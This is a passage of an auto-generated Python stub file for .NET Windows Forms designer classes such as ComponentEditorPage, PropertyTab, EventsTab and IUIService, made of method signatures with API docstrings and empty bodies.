pass
def ReloadComponent(self, *args): #cannot find CLR method
"""
ReloadComponent(self: ComponentEditorPage)
Reloads the component for the page.
"""
pass
def RescaleConstantsForDpi(self, *args): #cannot find CLR method
""" RescaleConstantsForDpi(self: Control, deviceDpiOld: int, deviceDpiNew: int) """
pass
def ResetMouseEventArgs(self, *args): #cannot find CLR method
"""
ResetMouseEventArgs(self: Control)
Resets the control to handle the System.Windows.Forms.Control.MouseLeave event.
"""
pass
def RtlTranslateAlignment(self, *args): #cannot find CLR method
"""
RtlTranslateAlignment(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
RtlTranslateAlignment(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
RtlTranslateAlignment(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateContent(self, *args): #cannot find CLR method
"""
RtlTranslateContent(self: Control, align: ContentAlignment) -> ContentAlignment
Converts the specified System.Drawing.ContentAlignment to the appropriate
System.Drawing.ContentAlignment to support right-to-left text.
align: One of the System.Drawing.ContentAlignment values.
Returns: One of the System.Drawing.ContentAlignment values.
"""
pass
def RtlTranslateHorizontal(self, *args): #cannot find CLR method
"""
RtlTranslateHorizontal(self: Control, align: HorizontalAlignment) -> HorizontalAlignment
Converts the specified System.Windows.Forms.HorizontalAlignment to the appropriate
System.Windows.Forms.HorizontalAlignment to support right-to-left text.
align: One of the System.Windows.Forms.HorizontalAlignment values.
Returns: One of the System.Windows.Forms.HorizontalAlignment values.
"""
pass
def RtlTranslateLeftRight(self, *args): #cannot find CLR method
"""
RtlTranslateLeftRight(self: Control, align: LeftRightAlignment) -> LeftRightAlignment
Converts the specified System.Windows.Forms.LeftRightAlignment to the appropriate
System.Windows.Forms.LeftRightAlignment to support right-to-left text.
align: One of the System.Windows.Forms.LeftRightAlignment values.
Returns: One of the System.Windows.Forms.LeftRightAlignment values.
"""
pass
def SaveComponent(self, *args): #cannot find CLR method
"""
SaveComponent(self: ComponentEditorPage)
Saves the component from the page user interface (UI).
"""
pass
def ScaleControl(self, *args): #cannot find CLR method
"""
ScaleControl(self: ScrollableControl, factor: SizeF, specified: BoundsSpecified)
factor: The factor by which the height and width of the control will be scaled.
specified: A System.Windows.Forms.BoundsSpecified value that specifies the bounds of the control to use
when defining its size and position.
"""
pass
def ScaleCore(self, *args): #cannot find CLR method
"""
ScaleCore(self: ScrollableControl, dx: Single, dy: Single)
dx: The horizontal scaling factor.
dy: The vertical scaling factor.
"""
pass
def ScrollToControl(self, *args): #cannot find CLR method
"""
ScrollToControl(self: ScrollableControl, activeControl: Control) -> Point
Calculates the scroll offset to the specified child control.
activeControl: The child control to scroll into view.
Returns: The upper-left hand System.Drawing.Point of the display area relative to the client area
required to scroll the control into view.
"""
pass
def Select(self):
"""
Select(self: Control, directed: bool, forward: bool)
Activates a child control. Optionally specifies the direction in the tab order to select the
control from.
directed: true to specify the direction of the control to select; otherwise, false.
forward: true to move forward in the tab order; false to move backward in the tab order.
"""
pass
def SetAutoSizeMode(self, *args): #cannot find CLR method
"""
SetAutoSizeMode(self: Control, mode: AutoSizeMode)
Sets a value indicating how a control will behave when its System.Windows.Forms.Control.AutoSize
property is enabled.
mode: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def SetBoundsCore(self, *args): #cannot find CLR method
"""
SetBoundsCore(self: Control, x: int, y: int, width: int, height: int, specified: BoundsSpecified)
Performs the work of setting the specified bounds of this control.
x: The new System.Windows.Forms.Control.Left property value of the control.
y: The new System.Windows.Forms.Control.Top property value of the control.
width: The new System.Windows.Forms.Control.Width property value of the control.
height: The new System.Windows.Forms.Control.Height property value of the control.
specified: A bitwise combination of the System.Windows.Forms.BoundsSpecified values.
"""
pass
def SetClientSizeCore(self, *args): #cannot find CLR method
"""
SetClientSizeCore(self: Control, x: int, y: int)
Sets the size of the client area of the control.
x: The client area width, in pixels.
y: The client area height, in pixels.
"""
pass
def SetComponent(self, component):
"""
SetComponent(self: ComponentEditorPage, component: IComponent)
Sets the component to be edited.
component: The System.ComponentModel.IComponent to be edited.
"""
pass
def SetDirty(self, *args): #cannot find CLR method
"""
SetDirty(self: ComponentEditorPage)
Sets the page as changed since the last load or save.
"""
pass
def SetDisplayRectLocation(self, *args): #cannot find CLR method
"""
SetDisplayRectLocation(self: ScrollableControl, x: int, y: int)
Positions the display window to the specified value.
x: The horizontal offset at which to position the System.Windows.Forms.ScrollableControl.
y: The vertical offset at which to position the System.Windows.Forms.ScrollableControl.
"""
pass
def SetScrollState(self, *args): #cannot find CLR method
"""
SetScrollState(self: ScrollableControl, bit: int, value: bool)
Sets the specified scroll state flag.
bit: The scroll state flag to set.
value: The value to set the flag.
"""
pass
def SetSite(self, site):
"""
SetSite(self: ComponentEditorPage, site: IComponentEditorPageSite)
Sets the site for this page.
site: The site for this page.
"""
pass
def SetStyle(self, *args): #cannot find CLR method
"""
SetStyle(self: Control, flag: ControlStyles, value: bool)
Sets a specified System.Windows.Forms.ControlStyles flag to either true or false.
flag: The System.Windows.Forms.ControlStyles bit to set.
value: true to apply the specified style to the control; otherwise, false.
"""
pass
def SetTopLevel(self, *args): #cannot find CLR method
"""
SetTopLevel(self: Control, value: bool)
Sets the control as the top-level control.
value: true to set the control as the top-level control; otherwise, false.
"""
pass
def SetVisibleCore(self, *args): #cannot find CLR method
"""
SetVisibleCore(self: Control, value: bool)
Sets the control to the specified visible state.
value: true to make the control visible; otherwise, false.
"""
pass
def ShowHelp(self):
"""
ShowHelp(self: ComponentEditorPage)
Shows Help information if the page supports Help information.
"""
pass
def SizeFromClientSize(self, *args): #cannot find CLR method
"""
SizeFromClientSize(self: Control, clientSize: Size) -> Size
Determines the size of the entire control from the height and width of its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def SupportsHelp(self):
"""
SupportsHelp(self: ComponentEditorPage) -> bool
Gets a value indicating whether the editor supports Help.
Returns: true if the editor supports Help; otherwise, false. The default implementation returns false.
"""
pass
def UpdateBounds(self, *args): #cannot find CLR method
"""
UpdateBounds(self: Control, x: int, y: int, width: int, height: int, clientWidth: int, clientHeight: int)
Updates the bounds of the control with the specified size, location, and client size.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
clientWidth: The client System.Drawing.Size.Width of the control.
clientHeight: The client System.Drawing.Size.Height of the control.
UpdateBounds(self: Control, x: int, y: int, width: int, height: int)
Updates the bounds of the control with the specified size and location.
x: The System.Drawing.Point.X coordinate of the control.
y: The System.Drawing.Point.Y coordinate of the control.
width: The System.Drawing.Size.Width of the control.
height: The System.Drawing.Size.Height of the control.
UpdateBounds(self: Control)
Updates the bounds of the control with the current size and location.
"""
pass
def UpdateStyles(self, *args): #cannot find CLR method
"""
UpdateStyles(self: Control)
Forces the assigned styles to be reapplied to the control.
"""
pass
def UpdateZOrder(self, *args): #cannot find CLR method
"""
UpdateZOrder(self: Control)
Updates the control in its parent's z-order.
"""
pass
def WndProc(self, *args): #cannot find CLR method
"""
WndProc(self: ScrollableControl, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def __enter__(self, *args): #cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): #cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
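The __enter__/__exit__ stubs above adapt .NET's IDisposable protocol to Python's with statement: entering returns the object, and exiting disposes it regardless of whether an exception occurred. A hedged pure-Python sketch of that adapter (the Disposable class and its attributes are illustrative, not part of the stub):

```python
class Disposable:
    """Illustrative IDisposable-style object usable with Python's `with`."""

    def __init__(self):
        self.disposed = False

    def Dispose(self):
        """Release resources, like IDisposable.Dispose in .NET."""
        self.disposed = True

    def __enter__(self):
        # Mirrors the stub: `with obj as x` binds x to the object itself.
        return self

    def __exit__(self, exc_type, exc_value, exc_back):
        # Dispose on scope exit, even when an exception is propagating.
        self.Dispose()
        return False  # do not suppress exceptions


d = Disposable()
with d:
    pass
```

After the with block, `d.disposed` is True; this is the behavior the IronPython runtime supplies automatically for CLR objects implementing IDisposable.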
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __str__(self, *args): #cannot find CLR method
pass
AutoSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is not relevant for this class.
Get: AutoSize(self: ComponentEditorPage) -> bool
Set: AutoSize(self: ComponentEditorPage) = value
"""
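The property stubs in this file use the three-argument property(fget, fset, fdel) form with placeholder lambdas; in a working class the same triple wires up a real getter, setter, and deleter. An illustrative sketch under that assumption (Page and _auto_size are made-up names, not part of the stub):

```python
class Page:
    """Illustrative use of the property(fget, fset, fdel) triple the stubs mimic."""

    def __init__(self):
        self._auto_size = False

    AutoSize = property(
        lambda self: self._auto_size,                     # getter
        lambda self, v: setattr(self, "_auto_size", v),   # setter
        lambda self: delattr(self, "_auto_size"),         # deleter
    )


p = Page()
p.AutoSize = True
```

The stubs substitute do-nothing lambdas because the real accessors live in the CLR; the triple exists only so the attribute behaves like a property at import time.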
CanEnableIme = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value, to enable IME support.
"""
CanRaiseEvents = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Determines if events can be raised on the control.
"""
CommitOnDeactivate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Specifies whether the editor should apply its changes before it is deactivated.
Get: CommitOnDeactivate(self: ComponentEditorPage) -> bool
Set: CommitOnDeactivate(self: ComponentEditorPage) = value
"""
Component = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the component to edit.
"""
CreateParams = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the creation parameters for the control.
"""
DefaultCursor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the space, in pixels, that is specified by default between controls.
"""
DefaultMaximumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default maximum size of a control.
"""
DefaultMinimumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default minimum size of a control.
"""
DefaultPadding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the internal spacing, in pixels, of the contents of a control.
"""
DefaultSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DesignMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether this control should redraw its surface using a secondary buffer to reduce or prevent flicker.
"""
Events = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FirstActivate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the page is being activated for the first time.
"""
FontHeight = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the height of the font of the control.
"""
HScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the horizontal scroll bar is visible.
"""
Icon = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the icon for the page.
Get: Icon(self: ComponentEditorPage) -> Icon
Set: Icon(self: ComponentEditorPage) = value
"""
ImeModeBase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the IME mode of a control.
"""
Loading = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Indicates how many load dependencies remain until loading has been completed.
"""
LoadRequired = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether a component must be loaded before editing can occur.
"""
PageSite = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the page site.
"""
RenderRightToLeft = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is now obsolete.
"""
ResizeRedraw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the control redraws itself when resized.
"""
ScaleChildren = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that determines the scaling of child controls.
"""
ShowFocusCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the control should display focus rectangles.
"""
ShowKeyboardCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the user interface is in the appropriate state to show or hide keyboard accelerators.
"""
Title = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the title of the page.
Get: Title(self: ComponentEditorPage) -> str
"""
VScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the vertical scroll bar is visible.
"""
AutoSizeChanged = None
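The `__enter__`/`__exit__` stubs above document that these CLR objects implement IDisposable and therefore work in a `with` block, with `Dispose` called on exit. A minimal pure-Python sketch of that protocol (`DisposableDemo` is an illustrative stand-in, not a real WinForms control, which would require a .NET host):

```python
# Sketch of the __enter__/__exit__ protocol the stubs describe for CLR
# IDisposable objects: entering yields the object, exiting calls Dispose().
class DisposableDemo(object):
    def __init__(self):
        self.disposed = False

    def Dispose(self):
        self.disposed = True

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_back):
        self.Dispose()
        return False  # do not swallow exceptions raised in the block

with DisposableDemo() as page:
    assert page.disposed is False  # still live inside the block
print(page.disposed)  # True
```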
class PropertyTab(object, IExtenderProvider):
""" Provides a base class for property tabs. """
def CanExtend(self, extendee):
"""
CanExtend(self: PropertyTab, extendee: object) -> bool
Gets a value indicating whether this System.Windows.Forms.Design.PropertyTab can display
properties for the specified component.
extendee: The object to test.
Returns: true if the object can be extended; otherwise, false.
"""
pass
def Dispose(self):
"""
Dispose(self: PropertyTab)
Releases all the resources used by the System.Windows.Forms.Design.PropertyTab.
"""
pass
def GetDefaultProperty(self, component):
"""
GetDefaultProperty(self: PropertyTab, component: object) -> PropertyDescriptor
Gets the default property of the specified component.
component: The component to retrieve the default property of.
Returns: A System.ComponentModel.PropertyDescriptor that represents the default property.
"""
pass
def GetProperties(self, *__args):
"""
GetProperties(self: PropertyTab, context: ITypeDescriptorContext, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets the properties of the specified component that match the specified attributes and context.
context: An System.ComponentModel.ITypeDescriptorContext that indicates the context to retrieve
properties from.
component: The component to retrieve properties from.
attributes: An array of type System.Attribute that indicates the attributes of the properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties matching the
specified context and attributes.
GetProperties(self: PropertyTab, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets the properties of the specified component that match the specified attributes.
component: The component to retrieve properties from.
attributes: An array of type System.Attribute that indicates the attributes of the properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties.
GetProperties(self: PropertyTab, component: object) -> PropertyDescriptorCollection
Gets the properties of the specified component.
component: The component to retrieve the properties of.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties of the
component.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args): #cannot find CLR method
""" __repr__(self: object) -> str """
pass
Bitmap = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the bitmap that is displayed for the System.Windows.Forms.Design.PropertyTab.
Get: Bitmap(self: PropertyTab) -> Bitmap
"""
Components = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the array of components the property tab is associated with.
Get: Components(self: PropertyTab) -> Array[object]
Set: Components(self: PropertyTab) = value
"""
HelpKeyword = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the Help keyword that is to be associated with this tab.
Get: HelpKeyword(self: PropertyTab) -> str
"""
TabName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the name for the property tab.
Get: TabName(self: PropertyTab) -> str
"""
class EventsTab(PropertyTab, IExtenderProvider):
"""
Provides a System.Windows.Forms.Design.PropertyTab that can display events for selection and linking.
EventsTab(sp: IServiceProvider)
"""
def CanExtend(self, extendee):
"""
CanExtend(self: EventsTab, extendee: object) -> bool
Gets a value indicating whether the specified object can be extended.
extendee: The object to test for extensibility.
Returns: true if the specified object can be extended; otherwise, false.
"""
pass
def Dispose(self):
"""
Dispose(self: PropertyTab, disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.Design.PropertyTab and
optionally releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def GetDefaultProperty(self, obj):
"""
GetDefaultProperty(self: EventsTab, obj: object) -> PropertyDescriptor
Gets the default property from the specified object.
obj: The object to retrieve the default property of.
Returns: A System.ComponentModel.PropertyDescriptor indicating the default property.
"""
pass
def GetProperties(self, *__args):
"""
GetProperties(self: EventsTab, context: ITypeDescriptorContext, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets all the properties of the event tab that match the specified attributes and context.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain context information.
component: The component to retrieve the properties of.
attributes: An array of type System.Attribute that indicates the attributes of the event properties to
retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties. This will be
an empty System.ComponentModel.PropertyDescriptorCollection if the component does not implement
an event service.
GetProperties(self: EventsTab, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets all the properties of the event tab that match the specified attributes.
component: The component to retrieve the properties of.
attributes: An array of System.Attribute that indicates the attributes of the event properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties. This will be
an empty System.ComponentModel.PropertyDescriptorCollection if the component does not implement
an event service.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, sp):
""" __new__(cls: type, sp: IServiceProvider) """
pass
HelpKeyword = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the Help keyword for the tab.
Get: HelpKeyword(self: EventsTab) -> str
"""
TabName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the name of the tab.
Get: TabName(self: EventsTab) -> str
"""
class IUIService:
""" Enables interaction with the user interface of the development environment object that is hosting the designer. """
def CanShowComponentEditor(self, component):
"""
CanShowComponentEditor(self: IUIService, component: object) -> bool
Indicates whether the component can display a System.Windows.Forms.Design.ComponentEditorForm.
component: The component to check for support for displaying a
System.Windows.Forms.Design.ComponentEditorForm.
Returns: true if the specified component can display a component editor form; otherwise, false.
"""
pass
def GetDialogOwnerWindow(self):
"""
GetDialogOwnerWindow(self: IUIService) -> IWin32Window
Gets the window that should be used as the owner when showing dialog boxes.
Returns: An System.Windows.Forms.IWin32Window that indicates the window to own any child dialog boxes.
"""
pass
def SetUIDirty(self):
"""
SetUIDirty(self: IUIService)
Sets a flag indicating the UI has changed.
"""
pass
def ShowComponentEditor(self, component, parent):
"""
ShowComponentEditor(self: IUIService, component: object, parent: IWin32Window) -> bool
Attempts to display a System.Windows.Forms.Design.ComponentEditorForm for a component.
component: The component for which to display a System.Windows.Forms.Design.ComponentEditorForm.
parent: The System.Windows.Forms.IWin32Window to parent any dialog boxes to.
Returns: true if the attempt is successful; otherwise, false.
"""
pass
def ShowDialog(self, form):
"""
ShowDialog(self: IUIService, form: Form) -> DialogResult
Attempts to display the specified form in a dialog box.
form: The System.Windows.Forms.Form to display.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned by the
dialog box.
"""
pass
def ShowError(self, *__args):
"""
ShowError(self: IUIService, ex: Exception, message: str)
Displays the specified exception and information about the exception in a message box.
ex: The System.Exception to display.
message: A message to display that provides information about the exception.
ShowError(self: IUIService, ex: Exception)
Displays the specified exception and information about the exception in a message box.
ex: The System.Exception to display.
ShowError(self: IUIService, message: str)
Displays the specified error message in a message box.
message: The error message to display.
"""
pass
def ShowMessage(self, message, caption=None, buttons=None):
"""
ShowMessage(self: IUIService, message: str, caption: str, buttons: MessageBoxButtons) -> DialogResult
Displays the specified message in a message box with the specified caption and buttons to place
on the dialog box.
message: The message to display.
caption: The caption for the dialog box.
buttons: One of the System.Windows.Forms.MessageBoxButtons values:
System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxButtons.OKCancel,
System.Windows.Forms.MessageBoxButtons.YesNo, or
System.Windows.Forms.MessageBoxButtons.YesNoCancel.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned by the
dialog box.
ShowMessage(self: IUIService, message: str, caption: str)
Displays the specified message in a message box with the specified caption.
message: The message to display.
caption: The caption for the message box.
ShowMessage(self: IUIService, message: str)
Displays the specified message in a message box.
message: The message to display
"""
pass
def ShowToolWindow(self, toolWindow):
"""
ShowToolWindow(self: IUIService, toolWindow: Guid) -> bool
Displays the specified tool window.
toolWindow: A System.Guid identifier for the tool window. This can be a custom System.Guid or one of the
predefined values from System.ComponentModel.Design.StandardToolWindows.
Returns: true if the tool window was successfully shown; false if it could not be shown or found.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Styles = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the collection of styles that are specific to the host's environment.
Get: Styles(self: IUIService) -> IDictionary
"""
class IWindowsFormsEditorService:
""" Provides an interface for a System.Drawing.Design.UITypeEditor to display Windows Forms or to display a control in a drop-down area from a property grid control in design mode. """
def CloseDropDown(self):
"""
CloseDropDown(self: IWindowsFormsEditorService)
Closes any previously opened drop down control area.
"""
pass
def DropDownControl(self, control):
"""
DropDownControl(self: IWindowsFormsEditorService, control: Control)
Displays the specified control in a drop down area below a value field of the property grid that
provides this service.
control: The drop down list System.Windows.Forms.Control to open.
"""
pass
def ShowDialog(self, dialog):
"""
ShowDialog(self: IWindowsFormsEditorService, dialog: Form) -> DialogResult
Shows the specified System.Windows.Forms.Form.
dialog: The System.Windows.Forms.Form to display.
Returns: A System.Windows.Forms.DialogResult indicating the result code returned by the
System.Windows.Forms.Form.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class ToolStripItemDesignerAvailability(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies controls that are visible in the designer.
enum (flags) ToolStripItemDesignerAvailability, values: All (15), ContextMenuStrip (4), MenuStrip (2), None (0), StatusStrip (8), ToolStrip (1)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
All = None
ContextMenuStrip = None
MenuStrip = None
# 'None' is a reserved word in Python and cannot be assigned, so the CLR
# member None (value 0) is not bound here; under a .NET host it can be
# retrieved with getattr(ToolStripItemDesignerAvailability, 'None').
StatusStrip = None
ToolStrip = None
value__ = None
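The class docstring above lists the flag values. A pure-Python `enum.IntFlag` replica (illustrative only, not the CLR type, which exists only under IronPython/pythonnet) shows how they combine bitwise:

```python
from enum import IntFlag

class ToolStripItemDesignerAvailabilityDemo(IntFlag):
    # Mirrors the values in the stub docstring; 'None' is renamed NONE
    # because it is a reserved word in Python.
    NONE = 0
    TOOL_STRIP = 1
    MENU_STRIP = 2
    CONTEXT_MENU_STRIP = 4
    STATUS_STRIP = 8
    ALL = 15  # TOOL_STRIP | MENU_STRIP | CONTEXT_MENU_STRIP | STATUS_STRIP

combined = (ToolStripItemDesignerAvailabilityDemo.MENU_STRIP
            | ToolStripItemDesignerAvailabilityDemo.STATUS_STRIP)
print(int(combined))  # 10
```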
class ToolStripItemDesignerAvailabilityAttribute(Attribute, _Attribute):
"""
Specifies which types a System.Windows.Forms.ToolStripItem can appear in. This class cannot be inherited.
ToolStripItemDesignerAvailabilityAttribute()
ToolStripItemDesignerAvailabilityAttribute(visibility: ToolStripItemDesignerAvailability)
"""
def Equals(self, obj):
"""
Equals(self: ToolStripItemDesignerAvailabilityAttribute, obj: object) -> bool
obj: An System.Object to compare with this instance or null.
Returns: true if obj equals the type and value of this instance; otherwise, false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: ToolStripItemDesignerAvailabilityAttribute) -> int
Returns: A 32-bit signed integer hash code.
"""
pass
def IsDefaultAttribute(self):
"""
IsDefaultAttribute(self: ToolStripItemDesignerAvailabilityAttribute) -> bool
When overridden in a derived class, indicates whether the value of this instance is the default
value for the derived class.
Returns: true if this instance is the default attribute for the class; otherwise, false.
"""
pass
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==y """
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, visibility=None):
"""
__new__(cls: type)
__new__(cls: type, visibility: ToolStripItemDesignerAvailability)
"""
pass
def __ne__(self, *args): #cannot find CLR method
pass
ItemAdditionVisibility = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the visibility of a System.Windows.Forms.ToolStripItem.
Get: ItemAdditionVisibility(self: ToolStripItemDesignerAvailabilityAttribute) -> ToolStripItemDesignerAvailability
"""
Default = None
class WindowsFormsComponentEditor(ComponentEditor):
""" Provides a base class for editors that use a modal dialog to display a properties page similar to an ActiveX control's property page. """
def EditComponent(self, *__args):
"""
EditComponent(self: WindowsFormsComponentEditor, context: ITypeDescriptorContext, component: object, owner: IWin32Window) -> bool
Creates an editor window that allows the user to edit the specified component.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain additional context
information.
component: The component to edit.
owner: An System.Windows.Forms.IWin32Window that the component belongs to.
Returns: true if the component was changed during editing; otherwise, false.
EditComponent(self: WindowsFormsComponentEditor, component: object, owner: IWin32Window) -> bool
Creates an editor window that allows the user to edit the specified component, using the
specified window that owns the component.
component: The component to edit.
owner: An System.Windows.Forms.IWin32Window that the component belongs to.
Returns: true if the component was changed during editing; otherwise, false.
EditComponent(self: WindowsFormsComponentEditor, context: ITypeDescriptorContext, component: object) -> bool
Creates an editor window that allows the user to edit the specified component, using the
specified context information.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain additional context
information.
component: The component to edit.
Returns: true if the component was changed during editing; otherwise, false.
"""
pass
def GetComponentEditorPages(self, *args): #cannot find CLR method
"""
GetComponentEditorPages(self: WindowsFormsComponentEditor) -> Array[Type]
Gets the component editor pages associated with the component editor.
Returns: An array of component editor pages.
"""
pass
def GetInitialComponentEditorPageIndex(self, *args): #cannot find CLR method
"""
GetInitialComponentEditorPageIndex(self: WindowsFormsComponentEditor) -> int
Gets the index of the initial component editor page for the component editor to display.
Returns: The index of the component editor page that the component editor will initially display.
"""
pass
